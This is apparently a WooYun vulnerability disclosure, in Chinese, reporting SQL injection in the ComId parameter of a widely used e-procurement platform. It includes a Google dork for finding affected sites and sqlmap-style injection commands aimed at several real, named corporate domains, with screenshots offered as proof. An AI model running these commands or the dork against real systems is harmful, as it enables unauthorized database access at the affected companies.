### 简要描述:
sql注入,应该没重复吧
### 详细说明:
之前大牛提交过,其他的还没搜到
[WooYun: 某通用型电子采购平台SQL注射(涉及大量企业)](http://www.wooyun.org/bugs/wooyun-2014-062918)
google:inurl:custom/CompanyCGList.aspx?ComId=
[<img src="https://images.seebug.org/upload/201409/021623122a1ac1059376c9fbf6d16af0c8e52a57.png" alt="aa.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/021623122a1ac1059376c9fbf6d16af0c8e52a57.png)
目测为一采通电子采购平台,所属:北京网达信联科技发展有限公司
百度百科介绍:http://baike.baidu.com/view/5293437.htm?fr=aladdin
涉及大量企业
其中ComId参数存在注入
```
http://eps.alnan.com.cn/custom/CompanyCGList.aspx?ComId=1 --current-user
```
[<img src="https://images.seebug.org/upload/201409/02161002954c2cbe3032b63848cdd885c81635e2.jpg" alt="deba827e-5d25-4485-abe5-7d1a0fb43386.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/02161002954c2cbe3032b63848cdd885c81635e2.jpg)
```
http://eps.sinoma-cem.cn/custom/CompanyCGList.aspx?ComId=1 --current-user
```
[<img src="https://images.seebug.org/upload/201409/0216110177eafd66a1f24146096522e190d2d3af.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/0216110177eafd66a1f24146096522e190d2d3af.jpg)
```
sqlmap -u http://www.qlszb.com/custom/CompanyCGList.aspx?ComId=1 --current-user
```
[<img src="https://images.seebug.org/upload/201409/02162137825ee4edaf51fa0da8fc017598a293da.jpg" alt="QQ圖片20140902162117.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/02162137825ee4edaf51fa0da8fc017598a293da.jpg)
### 漏洞证明:
有很多
[<img src="https://images.seebug.org/upload/201409/02161002954c2cbe3032b63848cdd885c81635e2.jpg" alt="deba827e-5d25-4485-abe5-7d1a0fb43386.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/02161002954c2cbe3032b63848cdd885c81635e2.jpg)
[<img src="https://images.seebug.org/upload/201409/0216110177eafd66a1f24146096522e190d2d3af.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/0216110177eafd66a1f24146096522e190d2d3af.jpg)
[<img src="https://images.seebug.org/upload/201409/02162137825ee4edaf51fa0da8fc017598a293da.jpg" alt="QQ圖片20140902162117.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/02162137825ee4edaf51fa0da8fc017598a293da.jpg)
暂无评论